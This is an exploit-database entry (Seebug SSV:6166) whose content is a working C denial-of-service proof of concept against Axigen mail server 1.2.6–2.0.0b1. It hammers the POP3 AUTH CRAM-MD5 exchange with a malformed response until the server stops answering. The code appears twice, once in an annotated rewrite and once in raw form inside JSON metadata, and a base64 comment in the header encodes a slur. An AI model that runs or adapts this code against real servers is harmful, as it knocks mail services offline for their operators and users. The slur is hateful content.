ID SSV:6166
Type seebug
Reporter Root
Modified 2007-02-09T00:00:00
Description
No description provided by source. The listing below is a proof-of-concept denial-of-service client for Axigen 1.2.6 through 2.0.0b1 (mu-b, October 2006): it connects to the POP3 port, repeatedly issues AUTH CRAM-MD5 and answers the challenge with a fixed base64-encoded malformed response, reconnects when the server reports "(maximum number of protocol errors reached)", and treats four seconds of silence from the server as the crash.
/* doaxigen.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sat Oct 22 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* 0x08088054: parsing error results in DoS (little-endian, confirmed)
* DoS + off-by-one heap smash (big-endian)
*
* Note: if you receive a SIGPIPE then you crashed the server
* but at too high a memory address... try again.
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
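/* Buffer sizes and protocol constants.
 *
 * Every expression is parenthesised so the macros are safe inside larger
 * expressions: the original BBUF_SIZE expanded to BUF_SIZE/3*4+1, which
 * made e.g. 2 * BBUF_SIZE evaluate to the wrong value. */
#define BUF_SIZE 1024

/* Bytes needed to hold the base64 of BUF_SIZE input bytes: four output
 * characters per three input bytes, rounded UP (the original rounded down,
 * four bytes short for a full BUF_SIZE input), plus the terminating NUL. */
#define BBUF_SIZE (((BUF_SIZE) + 2) / 3 * 4 + 1)

#define AUTH_CMD "AUTH CRAM-MD5\r\n"
#define QUIT_CMD "QUIT\r\n"     /* declared for completeness; never sent by this PoC */

#define DEF_PORT 110
#define PORT_POP3 DEF_PORT

#define RCNT_DELAY 3            /* seconds to sleep before reconnecting */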
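/* Standard (RFC 4648) base64 alphabet, indexed by a 6-bit value. */
static const char base64tab[] =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  "abcdefghijklmnopqrstuvwxyz"
  "0123456789+/";

static int base64 (const u_char * ibuf, u_char * obuf, size_t n);
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static int sockami (u_char * host, int port);
static void zhammer (u_char * host);

/* base64: encode n bytes of ibuf into obuf as base64 with '=' padding and a
 * terminating NUL.
 *
 * obuf must have room for 4 * ceil(n / 3) + 1 bytes; the interface has no
 * room for a bound, so the caller sizes it.  Returns the encoded length
 * (strlen(obuf), always a multiple of 4; 0 for n == 0).  Indices are size_t
 * so the loop compares like with like against n, and the length is returned
 * from the write position instead of rescanning the output. */
static int
base64 (const u_char * ibuf, u_char * obuf, size_t n)
{
  size_t i, j = 0;

  for (i = 0; i < n; i += 3)
    {
      /* missing trailing bytes are treated as zero and padded with '=' */
      unsigned a = ibuf[i];
      unsigned b = i + 1 < n ? ibuf[i + 1] : 0;
      unsigned c = i + 2 < n ? ibuf[i + 2] : 0;

      obuf[j++] = base64tab[a >> 2];
      obuf[j++] = base64tab[((a & 3) << 4) | (b >> 4)];
      obuf[j++] = i + 1 < n ? base64tab[((b & 15) << 2) | (c >> 6)] : '=';
      obuf[j++] = i + 2 < n ? base64tab[c & 63] : '=';
    }

  obuf[j] = '\0';
  return (int) j;
}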
/* sock_send: write len bytes of src to sock.
 *
 * A plain pass-through to send(2) with no flags: the result is send's own
 * (bytes written, or -1 with errno set).  A short write is not retried
 * here, so a caller that cares must compare the result with len. */
static int
sock_send (int sock, u_char * src, int len)
{
  return send (sock, src, len, 0);
}
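/* sock_recv: read up to len bytes from sock into dst and NUL-terminate.
 *
 * dst must have room for len + 1 bytes and len must be non-negative.
 * Returns recv(2)'s result: the byte count, 0 when the peer has closed the
 * connection, or -1 with errno set.  Unlike the original, dst is a valid
 * (possibly empty) C string on EVERY return, including failure, so a caller
 * that goes on to strstr() the buffer never scans stale or unterminated
 * bytes. */
static int
sock_recv (int sock, u_char * dst, int len)
{
  int rbytes = (int) recv (sock, dst, (size_t) len, 0);

  dst[rbytes > 0 ? rbytes : 0] = '\0';
  return rbytes;
}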
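/* sockami: open a TCP connection to host:port and return the socket.
 *
 * host is resolved with gethostbyname(), so only an IPv4 result is accepted
 * (a sockaddr_in can hold nothing else).  Every failure is fatal: a message
 * goes to stderr and the process exits with EXIT_FAILURE (the original mixed
 * exit(-1) and EXIT_FAILURE).  stdout is flushed first because the callers
 * print progress without a trailing newline. */
static int
sockami (u_char * host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int sock;

  fflush (stdout);

  /* Resolve before creating the socket so a failed lookup leaks nothing.
   * gethostbyname() reports through h_errno, not errno, so the original
   * perror() here printed an unrelated message. */
  if ((hp = gethostbyname ((const char *) host)) == NULL)
    {
      fprintf (stderr, "gethostbyname(): cannot resolve %s\n",
               (const char *) host);
      exit (EXIT_FAILURE);
    }
  if (hp->h_addrtype != AF_INET
      || hp->h_length != (int) sizeof address.sin_addr)
    {
      fprintf (stderr, "gethostbyname(): %s did not resolve to an IPv4 address\n",
               (const char *) host);
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof address);
  /* h_addr_list[0] rather than the h_addr alias, which is a non-standard macro */
  memcpy (&address.sin_addr, hp->h_addr_list[0], sizeof address.sin_addr);
  address.sin_family = AF_INET;
  address.sin_port = htons (port);

  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket()");
      exit (EXIT_FAILURE);
    }

  if (connect (sock, (struct sockaddr *) &address, sizeof address) == -1)
    {
      perror ("connect()");
      close (sock);
      exit (EXIT_FAILURE);
    }

  return sock;
}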
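/* report_read_end: say why a read from the server ended early.
 * 0 is an orderly close by the peer; anything negative is a socket error. */
static void
report_read_end (int rbytes)
{
  if (rbytes == 0)
    printf ("\n+Server closed the connection.");
  else
    perror ("\nrecv()");
}

/* zhammer: drive the POP3 AUTH CRAM-MD5 exchange against host until the
 * server stops answering.
 *
 * Each round sends AUTH CRAM-MD5, reads the challenge line, answers with the
 * fixed base64 payload below and waits up to wait_secs for a reply.  A
 * timeout ends the run (the server appears to have gone down); a closed
 * connection or socket error ends it too, with a message; the server's
 * "(maximum number of protocol errors reached)" line triggers a pause and a
 * fresh connection.  Progress is printed every four rounds and the socket is
 * closed before returning.
 *
 * Fixes over the original: recv() returning 0 (peer closed) is now treated
 * as the end instead of looping into a send() that raised SIGPIPE; send()
 * results are checked; the `for (i = 0; i < -1; i++)` spelling of an
 * endless loop is gone; the inner rbytes no longer shadows the outer one. */
static void
zhammer (u_char * host)
{
  /* Answer to the CRAM-MD5 challenge: a double quote, a space and 32 hex
   * digits, kept byte-for-byte as in the original PoC.  It goes out
   * base64-encoded because that is what the AUTH exchange expects. */
  static const u_char md5[] = "\" d339490346794f964736669ae26e29df";
  const long wait_secs = 4;
  u_char sbuf[BBUF_SIZE];
  u_char rbuf[BUF_SIZE];
  size_t slen;
  unsigned int attempt;
  int sock, rbytes, ready;
  fd_set r_fds;
  struct timeval tv;

  /* BBUF_SIZE covers the base64 of BUF_SIZE input bytes plus a NUL and the
   * payload is far shorter than that, so the CRLF appended here always fits. */
  slen = (size_t) base64 (md5, sbuf, sizeof md5 - 1);
  sbuf[slen++] = '\r';
  sbuf[slen++] = '\n';
  sbuf[slen] = '\0';

  printf ("+Connecting to %s:%d.", (const char *) host, PORT_POP3);
  sock = sockami (host, PORT_POP3);

  /* greeting line */
  rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
  if (rbytes <= 0)
    {
      report_read_end (rbytes);
      close (sock);
      printf ("\n");
      return;
    }

  for (attempt = 1;; attempt++)
    {
      if (sock_send (sock, (u_char *) AUTH_CMD, strlen (AUTH_CMD)) < 0)
        {
          perror ("\nsend()");
          break;
        }
      rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
      if (rbytes <= 0)
        {
          report_read_end (rbytes);
          break;
        }

      if (sock_send (sock, sbuf, (int) slen) < 0)
        {
          perror ("\nsend()");
          break;
        }

      FD_ZERO (&r_fds);
      FD_SET (sock, &r_fds);
      tv.tv_sec = wait_secs;
      tv.tv_usec = 0;

      ready = select (sock + 1, &r_fds, NULL, NULL, &tv);
      if (ready == -1)
        {
          perror ("\nselect()");
          break;
        }
      if (ready == 0)
        {
          /* nothing within wait_secs: the server appears to have crashed */
          printf ("\n+No reply within %ld seconds.", wait_secs);
          break;
        }

      rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
      if (rbytes <= 0)
        {
          report_read_end (rbytes);
          break;
        }

      /* too many protocol errors on this session: start a new one */
      if (strstr ((char *) rbuf, "(maximum number of protocol errors reached)"))
        {
          close (sock);
          sleep (RCNT_DELAY);
          printf ("\n+Reconnecting to %s:%d.", (const char *) host, PORT_POP3);
          sock = sockami (host, PORT_POP3);
          rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
          if (rbytes <= 0)
            {
              report_read_end (rbytes);
              break;
            }
        }

      if (attempt % 4 == 0)
        printf ("..%u", attempt);
      fflush (stdout);
      usleep (1000);
    }

  close (sock);
  printf ("\n");
}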
int
main (int argc, char **argv)
{
printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\n"
"by: <mu-b@digit-labs.org>, <mu-b@65535.com>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
zhammer (argv[1]);
printf ("+Wh00t!\n");
return (EXIT_SUCCESS);
}
{"href": "https://www.seebug.org/vuldb/ssvid-6166", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-09T00:00:00", "title": "Axigen <= 2.0.0b1 Remote Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6166", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-02-09T00:00:00", "sourceData": "\n /* doaxigen.c\r\n *\r\n * axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)\r\n * by mu-b - Sat Oct 22 2006\r\n *\r\n * - Tested on: AXIGEN 1.2.6 (lnx)\r\n * AXIGEN 2.0.0b1 (lnx)\r\n *\r\n * 0x08088054: parsing error results in DoS (little-endian, confirmed)\r\n * DoS + off-by-one heap smash (big-endian)\r\n *\r\n * Note: if you receive a SIGPIPE then you crashed the server\r\n * but at too high a memory address... try again.\r\n */\r\n\r\n/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n\r\n#define BUF_SIZE 1024\r\n#define BBUF_SIZE BUF_SIZE/3*4+1\r\n\r\n#define AUTH_CMD "AUTH CRAM-MD5\\r\\n"\r\n#define QUIT_CMD "QUIT\\r\\n"\r\n\r\n#define DEF_PORT 110\r\n#define PORT_POP3 DEF_PORT\r\n\r\n#define RCNT_DELAY 3\r\n\r\nstatic const char base64tab[] =\r\n "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n\r\nstatic int base64 (const u_char * ibuf, u_char * obuf, size_t n);\r\nstatic int sock_send (int sock, u_char * src, int len);\r\nstatic int sock_recv (int sock, u_char * dst, int len);\r\nstatic void zhammer (u_char * host);\r\n\r\nstatic int\r\nbase64 (const u_char * ibuf, u_char * obuf, size_t n)\r\n{\r\n int a, b, c;\r\n int i, j;\r\n int d, e, f, g;\r\n\r\n a = b = c = 0;\r\n for (j = i = 0; i < n; i += 3)\r\n {\r\n a = (u_char) ibuf[i];\r\n b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;\r\n c = i + 2 < n ? 
(u_char) ibuf[i + 2] : 0;\r\n\r\n d = base64tab[a >> 2];\r\n e = base64tab[((a & 3) << 4) | (b >> 4)];\r\n f = base64tab[((b & 15) << 2) | (c >> 6)];\r\n g = base64tab[c & 63];\r\n\r\n if (i + 1 >= n)\r\n f = '=';\r\n if (i + 2 >= n)\r\n g = '=';\r\n\r\n obuf[j++] = d, obuf[j++] = e;\r\n obuf[j++] = f, obuf[j++] = g;\r\n }\r\n\r\n obuf[j++] = '\\0';\r\n\r\n return strlen (obuf);\r\n}\r\n\r\nstatic int\r\nsock_send (int sock, u_char * src, int len)\r\n{\r\n int sbytes;\r\n\r\n sbytes = send (sock, src, len, 0);\r\n\r\n return (sbytes);\r\n}\r\n\r\nstatic int\r\nsock_recv (int sock, u_char * dst, int len)\r\n{\r\n int rbytes;\r\n\r\n rbytes = recv (sock, dst, len, 0);\r\n if (rbytes >= 0)\r\n dst[rbytes] = '\\0';\r\n\r\n return (rbytes);\r\n}\r\n\r\nstatic int\r\nsockami (u_char * host, int port)\r\n{\r\n struct sockaddr_in address;\r\n struct hostent *hp;\r\n int sock;\r\n\r\n fflush (stdout);\r\n if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)\r\n {\r\n perror ("socket()");\r\n exit (-1);\r\n }\r\n\r\n if ((hp = gethostbyname (host)) == NULL)\r\n {\r\n perror ("gethostbyname()");\r\n exit (-1);\r\n }\r\n\r\n memset (&address, 0, sizeof (address));\r\n memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);\r\n address.sin_family = AF_INET;\r\n address.sin_port = htons (port);\r\n\r\n if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)\r\n {\r\n perror ("connect()");\r\n exit (EXIT_FAILURE);\r\n }\r\n\r\n return (sock);\r\n}\r\n\r\nstatic void\r\nzhammer (u_char * host)\r\n{\r\n int sock, rbytes;\r\n u_int i;\r\n u_char *md5 = "\\" d339490346794f964736669ae26e29df"; /* what was that? 
*/\r\n u_char sbuf[BBUF_SIZE], *sptr;\r\n u_char rbuf[BUF_SIZE];\r\n\r\n fd_set r_fds;\r\n struct timeval tv;\r\n\r\n base64 (md5, sbuf, strlen (md5));\r\n sptr = sbuf + strlen (sbuf);\r\n *sptr++ = '\\r', *sptr++ = '\\n', *sptr = '\\0';\r\n\r\n printf ("+Connecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n return;\r\n\r\n for (i = 0; i < -1; i++)\r\n {\r\n int rbytes;\r\n\r\n sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n break;\r\n\r\n sock_send (sock, sbuf, strlen (sbuf));\r\n\r\n FD_ZERO (&r_fds);\r\n FD_SET (sock, &r_fds);\r\n tv.tv_sec = 4; /* wait 4 seconds */\r\n tv.tv_usec = 0;\r\n\r\n rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);\r\n if (rbytes == -1) /* oh dear */\r\n perror ("select()");\r\n else if (rbytes) /* read response */\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n else /* timeout, server appears to have crashed!@$%! */\r\n break;\r\n\r\n /* hmmm, too many attempts, must re-connect... 
*/\r\n if (strstr (rbuf, "(maximum number of protocol errors reached)"))\r\n {\r\n close (sock);\r\n sleep (RCNT_DELAY);\r\n\r\n printf ("\\n+Reconnecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n }\r\n\r\n if (rbytes < 0)\r\n break;\r\n\r\n if (!((i + 1) % 4))\r\n printf ("..%d", i + 1);\r\n\r\n fflush (stdout);\r\n usleep (1000);\r\n }\r\n\r\n printf ("\\n");\r\n}\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\n printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\\n"\r\n "by: <mu-b@digit-labs.org>, <mu-b@65535.com>\\n\\n");\r\n\r\n if (argc <= 1)\r\n {\r\n fprintf (stderr, "Usage: %s <host>\\n", argv[0]);\r\n exit (EXIT_SUCCESS);\r\n }\r\n\r\n zhammer (argv[1]);\r\n\r\n printf ("+Wh00t!\\n");\r\n\r\n return (EXIT_SUCCESS);\r\n}\n ", "id": "SSV:6166", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:23", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-11-19T22:10:23", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:10:23", "rev": 2}, "vulnersScore": 0.5}, "references": []}
{}